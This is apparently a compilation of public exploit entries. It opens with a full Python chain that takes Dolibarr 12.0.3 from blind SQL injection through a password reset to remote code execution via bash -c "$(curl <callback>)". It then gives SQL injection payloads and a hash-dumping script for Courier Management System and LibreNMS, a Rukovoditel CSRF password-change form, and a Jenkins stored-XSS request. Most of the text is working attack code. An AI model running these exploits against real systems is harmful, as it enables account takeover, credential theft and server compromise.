
-
Dolibarr 12.0.3 - SQLi to RCE
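# Exploit Title: Dolibarr 12.0.3 - SQLi to RCE
# Date: 2/12/2020
# Exploit Author: coiffeur
# Write Up: https://therealcoiffeur.github.io/c10010, https://therealcoiffeur.github.io/c10011
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads.php, https://sourceforge.net/projects/dolibarr/files/Dolibarr%20ERP-CRM/12.0.3/
# Version: 12.0.3
"""Dolibarr 12.0.3: authenticated time-based blind SQLi -> password reset -> RCE.

Chain, as implemented below:
  1. log in with a low-privileged account (the script checks for the
     "Read customers orders" permission, since the injection point is the
     ``object_status`` field of commande/stats/index.php);
  2. measure the server's SLEEP() baseline, then extract the table prefix
     (from information_schema) and the first row of ``<prefix>user``
     (``login`` and ``pass_temp``) one character at a time;
  3. request a password reset for that login (the antispam image is solved
     with tesseract), read the freshly generated ``pass_temp`` back through
     the oracle, validate it via user/passwordforgotten.php and log in as
     that user;
  4. point MAIN_ANTIVIRUS_COMMAND at ``bash`` with a ``-c "$(curl <callback>)"``
     parameter and upload a file: whatever the callback URL serves is run by
     the web server.

Only run this against systems you are authorised to test.  TLS verification
is disabled on every request on purpose (lab targets with self-signed
certificates); remove ``verify=False`` for anything else.

This listing was recovered from a quoted-printable mangled copy: soft line
breaks (``=`` + newline) had split identifiers and strings, and ``=C3=A9``
style escapes replaced the accented characters of the French messages.
"""
import argparse
import binascii
import re
import sys
from io import BytesIO
from urllib.parse import quote_plus as qp

import bcrypt
import pytesseract
import requests
from bs4 import BeautifulSoup
from PIL import Image

DELTA = None                # average response time of a SLEEP(DELAY) probe
DEBUG = 1
SESSION = requests.session()
TRESHOLD = 0.80             # a probe counts as "slept" above DELTA * TRESHOLD
DELAY = 1                   # seconds handed to SLEEP()
LIKE = "%_subscription"     # any table ending in _subscription reveals the prefix
COLUMNS = ["login", "pass_temp"]
MAX_LEN = 100               # give up on a length probe beyond this
CAPTCHA_ATTEMPTS = 20       # OCR retries before get_antispam_code() gives up
CAPTCHA_ALPHABET = "aAbBCDeEFgGhHJKLmMnNpPqQRsStTuVwWXYZz2345679"
DEFAULT_CALLBACK = "http://127.0.0.1:8000/poc.txt"


def usage():
    """Print the banner/usage text and exit with a failure status."""
    banner = """NAME:
    Dolibarr SQLi to RCE (authenticate)

SYNOPSIS:
    python3 sqli_to_rce_12.0.3.py -t <BASE_URL> -u <USERNAME> -p <PASSWORD> [-c <CALLBACK_URL>]

EXAMPLE:
    python3 sqli_to_rce_12.0.3.py -t "http://127.0.0.1/projects/dolibarr/12.0.3/htdocs/" -u test -p test

AUTHOR:
    coiffeur
"""
    print(banner)
    sys.exit(1)


def to_hex_literal(text):
    """Return *text* as a MySQL hex literal (``0x...``) so no quotes are needed in a payload."""
    return "0x" + binascii.hexlify(text.encode()).decode()


def bcrypt_hash(password):
    """Return a bcrypt hash of *password*; this is what Dolibarr expects in ``passwordhash``."""
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()


def authenticate(url, username, password):
    """Log *SESSION* in through index.php.

    Returns 1 on the 302 redirect Dolibarr sends after a successful login,
    0 otherwise.
    """
    datas = {
        "actionlogin": "login",
        "loginfunction": "loginfunction",
        "username": username,
        "password": password,
    }
    r = SESSION.post(f"{url}index.php", data=datas, allow_redirects=False, verify=False)
    if r.status_code != 302:
        if DEBUG:
            print("[x] Authentication failed!")
        return 0
    if DEBUG:
        print(f" [*] Authenticated as: {username}")
    return 1


def get_antispam_code(base_url):
    """Fetch Dolibarr's antispam image and OCR it with tesseract.

    Dolibarr's codes are five characters drawn from CAPTCHA_ALPHABET; any
    OCR result that does not match is discarded and a new image requested.
    The image is decoded straight from memory (the original wrote it to a
    predictable name under /tmp first).  Returns "" after CAPTCHA_ATTEMPTS
    misreads so the caller can retry or give up instead of looping forever.
    """
    for _ in range(CAPTCHA_ATTEMPTS):
        r = SESSION.get(f"{base_url}core/antispamimage.php", verify=False)
        text = pytesseract.image_to_string(Image.open(BytesIO(r.content)))
        code = text.split("\n")[0]
        if len(code) == 5 and all(ch in CAPTCHA_ALPHABET for ch in code):
            return code
    return ""


def reset_password(url, login):
    """Ask Dolibarr to generate a new temporary password for *login*.

    Up to five attempts, each with a freshly solved antispam code.  Returns
    1 when the page confirms the request (English or French message), else 0.
    """
    headers = {"Referer": f"{url}user/passwordforgotten.php"}
    confirmations = (
        f"Request to change password for {login} sent to",
        f"Demande de changement de mot de passe pour {login} envoyée",
    )
    for _ in range(5):
        code = get_antispam_code(url)
        if not code:
            continue
        datas = {"action": "buildnewpassword", "username": login, "code": code}
        r = SESSION.post(f"{url}user/passwordforgotten.php", data=datas,
                         headers=headers, verify=False)
        if r.status_code != 200:
            continue
        # The original tested `r.text.find(msg)`, which is truthy (-1) when
        # the message is *absent*, so every 200 looked like a success.
        if any(msg in r.text for msg in confirmations):
            if DEBUG:
                print(f" [*] Password reset using code: {code}")
            return 1
    return 0


def change_password(url, login, pass_temp):
    """Validate the pending temporary password so it becomes the account password.

    Uses a bare ``requests.get`` (no session cookies) on purpose; Dolibarr
    answers with a 302 when the hash is accepted.
    """
    target = (f"{url}user/passwordforgotten.php?action=validatenewpassword"
              f"&username={qp(login)}&passwordhash={qp(bcrypt_hash(pass_temp))}")
    r = requests.get(target, allow_redirects=False, verify=False)
    if r.status_code == 302:
        if DEBUG:
            print(f" [*] Password changed: {pass_temp}")
        return 1
    return 0


def change_binary(url, command, parameters):
    """Set the antivirus command/parameters in admin/security_file.php (admin only).

    Returns 1 when the page confirms the update (English or French), else 0.
    """
    headers = {"Referer": f"{url}admin/security_file.php"}
    datas = {
        "action": "updateform",
        "MAIN_UPLOAD_DOC": "2048",
        "MAIN_UMASK": "0664",
        "MAIN_ANTIVIRUS_COMMAND": command,
        "MAIN_ANTIVIRUS_PARAM": parameters,
    }
    r = SESSION.post(f"{url}admin/security_file.php", data=datas, headers=headers, verify=False)
    if r.status_code == 200:
        for response in ("Record modified successfully", "Enregistrement modifié avec succès"):
            if response in r.text:
                if DEBUG:
                    print(" [*] Binary's path changed")
                return 1
    return 0


def trigger_exploit(url):
    """Upload a dummy file so the configured antivirus command gets executed.

    The upload content is built in memory (the original opened a local
    ``junk.txt`` and never closed it).  Either the "uploaded" or the
    "antivirus could not validate" message means the command ran.
    """
    headers = {"Referer": f"{url}admin/security_file.php"}
    files = {"userfile[]": ("junk.txt", b"junk")}
    datas = {"sendit": "Upload"}
    if DEBUG:
        print(" [*] Triggering reverse shell")
    r = SESSION.post(f"{url}admin/security_file.php", files=files, data=datas,
                     headers=headers, verify=False)
    if r.status_code == 200:
        outcomes = (
            "File(s) uploaded successfully",
            "The antivirus program was not able to validate the file (file might be infected by a virus)",
            "Fichier(s) téléversés(s) avec succès",
            "L'antivirus n'a pas pu valider ce fichier (il est probablement infecté par un virus) !",
        )
        if any(msg in r.text for msg in outcomes):
            if DEBUG:
                print(" [*] Exploit done")
            return 1
    return 0


def get_version(url):
    """Report whether index.php announces version 12.0.3; informational only."""
    r = SESSION.get(f"{url}index.php", verify=False)
    found = re.findall(r"Version Dolibarr [0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,2}", r.text)
    if found and "12.0.3" in found[0]:
        if DEBUG:
            print(f" [*] {found[0]} (exploit should work)")
        return 1
    if DEBUG:
        print("[*] Version may not be vulnerable")
    return 0


def get_privileges(url):
    """Check on user/perms.php that the current user has the customer-orders read right.

    Informational only: the result does not stop the exploit.  The user id
    is taken from the first ``id=<digits>`` occurrence on index.php, and an
    active permission is an ``<img title="Active">`` whose row mentions one
    of the two (FR/EN) permission labels.
    """
    privileges = ("Consulter les commandes clients", "Read customers orders")
    r = SESSION.get(f"{url}index.php", verify=False)
    found = re.findall(r"id=\d+", r.text)   # the original only matched one digit
    if found:
        user_id = found[0]
        if DEBUG:
            print(f" [*] id found: {user_id}")
        r = SESSION.get(f"{url}user/perms.php?{user_id}", verify=False)
        soup = BeautifulSoup(r.text, "html.parser")
        for img in soup.find_all("img"):
            if img.get("title") not in ("Actif", "Active"):
                continue
            for td in img.parent.parent.find_all("td"):
                # `privilege in td` tested the Tag's direct children, which
                # only matched when the label was the cell's sole content.
                cell_text = td.get_text()
                for privilege in privileges:
                    if privilege in cell_text:
                        if DEBUG:
                            print(f" [*] Check privileges: {privilege}")
                        return 1
    if DEBUG:
        print("[*] At the sight of the privileges, the exploit may fail")
    return 0


def check(url, payload):
    """POST *payload* as ``object_status`` to the order stats page; return the response time in seconds."""
    headers = {"Referer": f"{url}commande/stats/index.php?leftmenu=orders"}
    datas = {"object_status": payload}
    r = SESSION.post(f"{url}commande/stats/index.php", data=datas, headers=headers, verify=False)
    return r.elapsed.total_seconds()


def evaluate_delay(url):
    """Measure DELTA, the average time of four probes that always SLEEP(DELAY)."""
    global DELTA
    payload = f"IF(0<1, SLEEP({DELAY}), SLEEP(0))"
    deltas = [check(url, payload) for _ in range(4)]
    DELTA = sum(deltas) / len(deltas)
    if DEBUG:
        print(f" [+] Delta: {DELTA}")


def _slept(url, payload):
    """Time-based oracle: True when *payload* made the server sleep.

    Calibrates DELTA on first use so the comparison never runs against None.
    """
    if DELTA is None:
        evaluate_delay(url)
    return check(url, payload) >= DELTA * TRESHOLD


def _blind_length(url, expr, source):
    """Return ``LENGTH(expr)`` of ``SELECT expr FROM source`` via the oracle.

    The probe sleeps when the length is *not* greater than ``i``, so the
    first ``i`` that triggers a delay is the length itself.  Aborts the
    program past MAX_LEN, which almost certainly means the injection does
    not work.
    """
    for i in range(MAX_LEN + 2):
        payload = f"IF((SELECT LENGTH({expr}) FROM {source})>{i}, SLEEP(0), SLEEP({DELAY}))"
        if _slept(url, payload):
            return i
    print("[x] Exploit failed")
    sys.exit(1)


def _blind_string(url, expr, source, length):
    """Extract *length* characters of ``SELECT expr FROM source`` by binary search on ASCII 0..126."""
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 126
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (f"IF((SELECT ASCII(SUBSTR({expr},{pos},1)) FROM {source})<={mid}, "
                       f"SLEEP({DELAY}), SLEEP(0))")
            if _slept(url, payload):
                hi = mid
            else:
                lo = mid + 1
        chars.append(chr(lo))
    return "".join(chars)


def _prefix_source():
    """FROM-clause selecting the table whose name matches LIKE in information_schema."""
    return f"information_schema.tables WHERE table_name LIKE {to_hex_literal(LIKE)}"


def get_tbl_name_len(url):
    """Length of the name of the table matching LIKE."""
    return _blind_length(url, "table_name", _prefix_source())


def get_tbl_name(url, length):
    """Name (first *length* chars) of the table matching LIKE."""
    return _blind_string(url, "table_name", _prefix_source(), length)


def get_elt_len(url, tbl_name, column_name):
    """Length of *column_name* in the first row of *tbl_name*."""
    return _blind_length(url, column_name, f"{tbl_name} LIMIT 1")


def get_elt(url, tbl_name, column_name, length):
    """Value (first *length* chars) of *column_name* in the first row of *tbl_name*."""
    return _blind_string(url, column_name, f"{tbl_name} LIMIT 1", length)


def get_row(url, tbl_name):
    """Extract COLUMNS of the first row of *tbl_name* as a dict."""
    print(f" [*] Dump admin's infos from {tbl_name}")
    infos = {}
    for column_name in COLUMNS:
        elt_length = get_elt_len(url, tbl_name, column_name)
        infos[column_name] = get_elt(url, tbl_name, column_name, elt_length)
    if DEBUG:
        print(f" [+] Infos: {infos}")
    return infos


def _fail():
    """Print the common failure line and exit."""
    print("[x] Exploit failed!")
    sys.exit(1)


def main(url, username, password, callback=DEFAULT_CALLBACK):
    """Run the whole chain against *url* with low-privilege *username*/*password*.

    *callback* is the URL ``curl`` fetches on the target; its content is run
    by ``bash`` (the original hard-coded http://127.0.0.1:8000/poc.txt).
    A missing trailing slash on *url* is added since every path is appended
    to it verbatim.
    """
    if not url.endswith("/"):
        url += "/"

    print("[*] Requirements:")
    if not authenticate(url, username, password):
        _fail()
    get_version(url)
    get_privileges(url)

    print("\n[*] Starting exploit:")
    evaluate_delay(url)
    print(f" [*] Extract prefix (using table: {LIKE})")
    tbl_name = get_tbl_name(url, get_tbl_name_len(url))
    prefix = f"{tbl_name.split('_')[0]}_"
    if DEBUG:
        print(f" [+] Prefix: {prefix}")

    user_table_name = f"{prefix}user"
    infos = get_row(url, user_table_name)
    if not infos["login"]:
        _fail()

    if DEBUG:
        print(f" [*] Resetting {infos['login']}'s password")
    if not reset_password(url, infos["login"]):
        _fail()
    # the reset stored a fresh pass_temp; read it back through the oracle
    infos = get_row(url, user_table_name)

    # drop the low-privilege session, validate the new password, log in as the target
    SESSION.cookies.clear()
    if not change_password(url, infos["login"], infos["pass_temp"]):
        _fail()
    if not authenticate(url, infos["login"], infos["pass_temp"]):
        _fail()

    # the antivirus command is executed server-side on every upload
    if not change_binary(url, "bash", f'-c "$(curl {callback})"'):
        _fail()
    trigger_exploit(url)
    return 0


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", help="Base URL of Dolibarr")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    parser.add_argument("-c", default=DEFAULT_CALLBACK,
                        help=f"URL curl'ed and executed by the target (default: {DEFAULT_CALLBACK})")
    args = parser.parse_args()
    if not args.t or not args.u or not args.p:
        usage()
    main(args.t, args.u, args.p, args.c)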
-
Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection
# Exploit Title: Courier Management System 1.0 - 'MULTIPART street ' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Note: the Vendor Homepage and Software Link above point to the "Task Management System" package on sourcecodester, not to a Courier Management System; verify that the downloaded package matches the tested target before reproducing.

Step 1. Log into the application with valid credentials (this is an authenticated injection: the captured request must carry the session cookie).
Step 2. Click on Branch.
Step 3. Select New Branch: http://127.0.0.1/index.php?page=new_branch
Step 4. Fill in the form and click Save.
Step 5. Capture the request to "/ajax.php?action=save_branch" in Burp Suite.
Step 6. Save the request to a file and run sqlmap against it: sqlmap -r request --time-sec=5 --dbs
Step 7. sqlmap confirms the time-based blind injection in the multipart "street" field and can enumerate the database contents.

---
Parameter: MULTIPART street ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="id"

-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="street"

11111111111' AND (SELECT 8687 FROM (SELECT(SLEEP(5)))XZFt) AND 'OQNu'='OQNu
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="city"

111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="state"

1111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="zip_code"

11111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="country"

1111111111111
-----------------------------12317926718649295872939507245
Content-Disposition: form-data; name="contact"

111111111
-----------------------------12317926718649295872939507245--
---
-
LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Exploit Title: LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection
# Google Dork: Unknown
# Date: 13-12-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://www.librenms.org
# Software Link: https://github.com/librenms/librenms
# Update notice: https://community.librenms.org/t/v1-69-october-2020-info/13838
# Version: 1.46
# Tested on: Debian 10, PHP 7, LibreNMS 1.46; newer versions may also be affected up to the 1.69 fix
# CVE : N/A
#!/usr/bin/python3
# EXAMPLE:
# $ python3 poc_librenms-1.46_auth_sqli_timed.py librenms D32fwefwef http://192.168.252.14 2
# [*] Checking if authentication for page is required...
# [*] Visiting page to retrieve initial token and cookies...
# [*] Retrieving authenticated cookie...
# [*] Printing number of rows in table...
# 1
# [*] Found 1 rows of data in table 'users'
#
# [*] Retrieving 1 rows of data using 'username' as column and 'users' as table...
# [*] Extracting strings from row 1...
# librenms
# [*] Retrieved value 'librenKs' for column 'username' in row 1
# [*] Retrieving 1 rows of data using 'password' as column and 'users' as table...
# [*] Extracting strings from row 1...
# $2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr
# [*] Retrieved value '$2y$10$pAB/lLNoT8wx6IedB3Hnpu./QMBqN9MsqJUcBy7bsr' for column 'password' in row 1
#
# [+] Done!
#
# NOTE: in the sample run above the characters printed during extraction read
# "librenms" while the final value is reported as "librenKs": a purely
# time-based oracle misreads a character whenever a non-sleeping response is
# delayed (network jitter, server load) past the sleep threshold.  Use a larger
# sleep value and re-run / cross-check extracted values before relying on them.
# The bcrypt hash shown is also truncated (60 characters expected), because
# the extraction loop stops at a fixed maximum length.
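"""LibreNMS 1.46 authenticated time-based blind SQL injection in graph.php (``sort`` parameter).

The script logs in through the Laravel login form (CSRF ``_token`` + session
cookie), then uses the ``sort`` parameter of
``graph.php?type=port_mac_acc_total`` as a time-based oracle to read the
``username`` and ``password`` columns of the ``users`` table, one character
at a time.  Every request is sent with ``verify=False`` (lab targets with
self-signed certificates).

This listing was recovered from a quoted-printable mangled copy in which
soft line breaks had split two of the payload-building expressions.
"""
import os
import re
import sys

import requests
import urllib3
from bs4 import BeautifulSoup

# Optionally, use a proxy, e.g. "http://<user>:<pass>@<proxy>:<port>".
# An empty string clears any proxy inherited from the environment.
proxy = ""
for _var in ("http_proxy", "HTTP_PROXY", "https_proxy", "HTTPS_PROXY"):
    os.environ[_var] = proxy

# Disable cert warnings (verify=False is used on every request)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Per-request timeout in seconds
timeout = 10

# Injection prefix and suffix.  A probe has the shape
#   (select(sleep(<sleep>-(if(<cond>,0,<sleep>)))))
# so the server sleeps <sleep> seconds exactly when <cond> is true and
# sleep(0) otherwise.  The suffix carries two more closing parentheses than
# the prefix opens; presumably they close the query context the `sort`
# parameter is interpolated into -- keep it byte-identical.
inj_prefix = "(select(sleep("
inj_suffix = ")))))"

# Decimal digits '0'..'9', used when reading the row count
dec_begin = 48
dec_end = 57

# Printable ASCII range, used when reading column values
ascii_begin = 32
ascii_end = 126

# Literal pieces of the two probe templates (see _count_probe / _value_probe)
_COUNT_EXPR = "-(if(ORD(MID((select IFNULL(CAST(COUNT(*) AS NCHAR),0x20) FROM "
_VALUE_EXPR = "-(if(ord(mid((select ifnull(cast("


def keyboard_interrupt():
    """Handle CTRL-C: print a message and exit cleanly."""
    print("\n\n[*] User requested an interrupt, exiting...")
    sys.exit(0)


def http_headers():
    """Headers sent with every request (a minimal User-Agent)."""
    return {'User-Agent': 'Mozilla'}


def check_auth(url, headers):
    """Return True when graph.php answers with an "Unauthorized" page for anonymous users."""
    print("[*] Checking if authentication for page is required...")
    r = requests.get(url + "/graph.php", headers=headers, timeout=timeout, verify=False)
    return "Unauthorized" in r.text


def get_initial_token_and_cookies(url, headers):
    """Fetch /login and return ``(csrf_token, cookies)``.

    The token is the value of the ``_token`` hidden input; ``None`` when no
    such input exists.  The original returned on the *first* input element,
    so a form whose first input was not ``_token`` yielded ``None`` even
    though the token was present further down.
    """
    print("[*] Visiting page to retrieve initial token and cookies...")
    r = requests.get(url + "/login", headers=headers, timeout=timeout, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    for field in soup('input'):
        if field.get('name') == "_token":
            return field.get('value'), r.cookies
    return None, r.cookies


def get_valid_cookie(url, headers, token, cookies, usern, passw):
    """POST the login form and return the authenticated cookies; exits on failure.

    Success is detected by the "Overview | LibreNMS" title of the landing page.
    """
    print("[*] Retrieving authenticated cookie...")
    post_data = {'_token': token, 'username': usern, 'password': passw, 'submit': ''}
    r = requests.post(url + "/login", data=post_data, headers=headers, cookies=cookies,
                      timeout=timeout, verify=False)
    if "Overview | LibreNMS" in r.text:
        return r.cookies
    print("[!] No valid response from used session, exiting!\n")
    sys.exit(-1)


def sqli(url, headers, cookies, inj_str, sleep):
    """Send one probe through the ``sort`` parameter; True if the response took >= *sleep* seconds.

    Spaces are replaced by ``/**/`` comments so no URL-encoding is needed,
    and the query string is handed to requests pre-built (as a string) on
    purpose so parentheses, commas and ``*`` are sent verbatim.
    """
    comment_inj_str = re.sub(" ", "/**/", inj_str)
    inj_params = {
        'id': '1',
        'stat': 'none',
        'type': 'port_mac_acc_total',
        'sort': comment_inj_str,
        'debug': '1',
    }
    query = "&".join("%s=%s" % (k, v) for k, v in inj_params.items())
    r = requests.get(url, params=query, headers=headers, cookies=cookies,
                     timeout=timeout, verify=False)
    return r.elapsed.total_seconds() >= sleep


def _count_probe(table, pos, op, value, sleep):
    """Probe comparing ORD() of digit *pos* of ``COUNT(*) FROM table`` with *value* using *op*."""
    return (inj_prefix + str(sleep) + _COUNT_EXPR + table + ")," + str(pos) + ",1))"
            + op + str(value) + ",0," + str(sleep) + inj_suffix)


def _value_probe(column, table, row, pos, op, value, sleep):
    """Probe comparing ORD() of char *pos* of *column* in row *row* of *table* with *value*."""
    return (inj_prefix + str(sleep) + _VALUE_EXPR + column + " as NCHAR),0x20) from "
            + table + " LIMIT " + str(row) + ",1)," + str(pos) + ",1))"
            + op + str(value) + ",0," + str(sleep) + inj_suffix)


def get_rows(url, headers, cookies, table, sleep):
    """Return the row count of *table* as an int (False when nothing could be read).

    The count is read digit by digit, up to four digits: a position is
    first checked for holding any character (ORD > 1), then matched
    against '0'..'9'.
    """
    rows = ""
    max_pos_rows = 4
    for pos in range(1, max_pos_rows + 1):
        # stop at the first position that holds no character
        if not sqli(url, headers, cookies, _count_probe(table, pos, ">", 1, sleep), sleep):
            break
        for num_rows in range(dec_begin, dec_end + 1):
            if sqli(url, headers, cookies, _count_probe(table, pos, "=", num_rows, sleep), sleep):
                row_char = chr(num_rows)
                rows += row_char
                print(row_char, end='', flush=True)
                break
    if rows != "":
        print("\n[*] Found " + rows + " rows of data in table '" + table + "'\n")
        return int(rows)
    return False


def get_data(url, headers, cookies, row, column, table, sleep):
    """Extract *column* of row *row* (0-based LIMIT offset) from *table*, up to 49 characters.

    Each position is first tested for holding a printable character
    (ORD > ascii_begin), then matched linearly against the printable ASCII
    range.  Not efficient; a binary search would cut the request count.
    """
    extracted = ""
    max_pos_len = 50
    print("[*] Extracting strings from row " + str(row + 1) + "...")
    for pos in range(1, max_pos_len):
        if not sqli(url, headers, cookies,
                    _value_probe(column, table, row, pos, ">", ascii_begin, sleep), sleep):
            break
        for guess in range(ascii_begin, ascii_end + 1):
            if sqli(url, headers, cookies,
                    _value_probe(column, table, row, pos, "=", guess, sleep), sleep):
                extracted_char = chr(guess)
                extracted += extracted_char
                print(extracted_char, end='', flush=True)
                break
    return extracted


def main(argv):
    """Entry point: ``<username> <password> <url> <sleep_in_seconds>`` (argv excludes the program name)."""
    if len(argv) == 4:
        usern, passw, url = argv[0], argv[1], argv[2]
        sleep = int(argv[3])
    else:
        print("[*] Usage: " + sys.argv[0] + " <username> <password> <url> <sleep_in_seconds>\n")
        sys.exit(0)

    headers = http_headers()

    try:
        # Get a valid initial token and cookies
        token, cookies = get_initial_token_and_cookies(url, headers)

        # Check if authentication is required
        if check_auth(url, headers):
            valid_cookies = get_valid_cookie(url, headers, token, cookies, usern, passw)
        else:
            valid_cookies = cookies
            print("[+] Authentication not required, continue without authentication...")

        # Setting the correct vulnerable page
        url = url + "/graph.php"

        # The columns to retrieve and the table to retrieve them from
        columns = ['username', 'password']
        table = "users"

        print("[*] Printing number of rows in table...")
        rows = get_rows(url, headers, valid_cookies, table, sleep)
        if not rows:
            print("[!] Unable to retrieve rows, check requests.\n")
            sys.exit(-1)

        for column in columns:
            print("[*] Retrieving " + str(rows) + " rows of data using '" + column
                  + "' as column and '" + table + "' as table...")
            for row in range(0, rows):
                retrieved = get_data(url, headers, valid_cookies, row, column, table, sleep)
                print("\n[*] Retrieved value '" + retrieved + "' for column '" + column
                      + "' in row " + str(row + 1))

        print("\n[+] Done!\n")
    # HTTPError is a RequestException subclass: it must be listed before the
    # generic handler or it is unreachable (as it was in the original).
    except requests.exceptions.HTTPError as e:
        print("[!] Failed with error - " + str(e) + "\n")
        sys.exit(-1)
    except requests.exceptions.Timeout:
        print("[!] Timeout error\n")
        sys.exit(-1)
    except requests.exceptions.TooManyRedirects:
        print("[!] Too many redirects\n")
        sys.exit(-1)
    except requests.exceptions.ConnectionError:
        print("[!] Not able to connect to URL\n")
        sys.exit(-1)
    except requests.exceptions.RequestException as e:
        print("[!] " + str(e))
        sys.exit(-1)
    except KeyboardInterrupt:
        keyboard_interrupt()


# If we were called as a program, go execute the main function.
if __name__ == "__main__":
    main(sys.argv[1:])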
-
Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)
# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)
# Date: 2020-12-14
# Exploit Author: KeopssGroup0day,Inc
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# Tested on: Kali Linux

POC(localhost/index.php?module=users/change_password):

<html>
<!-- CSRF PoC -->
<!-- NOTE(review): the form carries a fixed form_session_token value captured
     from the author's own session.  A forged request from another origin
     can only succeed if the application does not bind that token to the
     victim's session (or does not check it at all); if it does, this
     request is rejected.  Confirm that behaviour on 2.6.1 before relying on
     the PoC.  The forged form also sends no current password, so the
     endpoint presumably does not require one, which is what makes a
     one-click password change possible. -->
<body>
<!-- rewrite the history entry so the PoC page's real URL is hidden -->
<script>history.pushState('', '', '/')</script>
<!-- "https://localhost" is a placeholder for the victim's Rukovoditel base URL -->
<form action="https://localhost/index.php?module=users/change_password&action=change" method="POST">
<input type="hidden" name="form_session_token" value="D^HUyTDh0X" />
<!-- the new password the victim's account is switched to; both fields must match -->
<input type="hidden" name="password_new" value="123456789" />
<input type="hidden" name="password_confirmation" value="123456789" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
--
-
Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
# Exploit Title: Jenkins 2.235.3 - 'X-Forwarded-For' Stored XSS
# Date: 11/12/2020
# Exploit Author: gx1
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://updates.jenkins-ci.org/download/war/
# Version: <= 2.251 and <= LTS 2.235.3
# Tested on: any
# CVE : CVE-2020-2231
# References:
https://www.jenkins.io/security/advisory/2020-08-12/#SECURITY-1955
https://www.openwall.com/lists/oss-security/2020/08/12/4

Vendor Description:
Jenkins 2.251 and earlier, LTS 2.235.3 and earlier does not escape the remote address of the host starting a build via 'Trigger builds remotely'. This results in a stored cross-site scripting (XSS) vulnerability exploitable by users with Job/Configure permission or knowledge of the Authentication Token. Jenkins 2.252, LTS 2.235.4 escapes the remote address of the host.

Technical Details and Exploitation:
When a build completes, Jenkins records a "cause" message that is displayed in the build history view. That message normally reflects the username, for example "Started by user gx1". When the 'Trigger builds remotely' feature is used, the remote client's IP address is shown instead: Started by remote host '<client-ip-address>'. To understand how the remote build trigger works, have a look at this post: https://narenchejara.medium.com/trigger-jenkins-job-remotely-using-jenkins-api-20973618a493

The message "Started by remote host '<client-ip-address>'" is not escaped. This may look harmless because a client cannot choose its own remote IP, but that is not entirely true: when the application server sits behind a proxy, the real client IP is not available to it (the connection comes from the proxy), so X-* headers are used to convey the real client information. A common one is X-Forwarded-For, which load balancers insert into the request to identify the address of the connecting client. When the server is configured to trust that header, its value becomes the "remote address" that Jenkins renders unescaped.
To exploit the vulnerability the attacker needs several conditions to hold:
- Remote build triggering must be enabled, and the attacker must know the job's API authentication token or have Job/Configure permission (which lets them set one);
- The application server hosting Jenkins must honour some X-* header to override the client IP. This is common, because Jenkins is usually deployed behind a reverse proxy and such override mechanisms are used to recover the client IP. In Apache Tomcat, for example, X-Forwarded-For header processing can be enabled as described in https://dacurry-tns.github.io/deploying-apereo-cas/setup_tomcat_configure-xforwardedfor-header-processing.html. Without such configuration the real socket address is used and the injected header value never reaches the page.

Proof Of Concept:
1. Identify the X-* header the application server uses to override the client IP. Suppose it is "X-Forwarded-For". The attacker can then place the payload in the X-Forwarded-For header value;
2. Send the following request:

GET /job/<project_name>/build?token=<token> HTTP/1.1
Host: <jenkins_host>:8080
X-Forwarded-For: gx1<script>alert(1);</script>
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=88DD2A6297E0E0FE9A59B310CA271715; screenResolution=1220x686
Connection: close

HTTP/1.1 201
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Content-Type-Options: nosniff
Location: http://<vulnenv>:8080/jenkins/queue/item/7/
Content-Length: 0
Date: Fri, 11 Dec 2020 17:04:06 GMT
Connection: close

<project_name> is the project that can be built remotely using <token>.
3.
To trigger the XSS, navigate to the build item in the build history once the build has finished. For example, if the build that just finished is #16, the stored XSS fires on http://<jenkins_host>/job/<project_name>/16/ (and on any other page that renders that build's cause).

Solution:
The following releases contain fixes for this vulnerability:
* Jenkins 2.252
* Jenkins LTS 2.235.4
-
Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
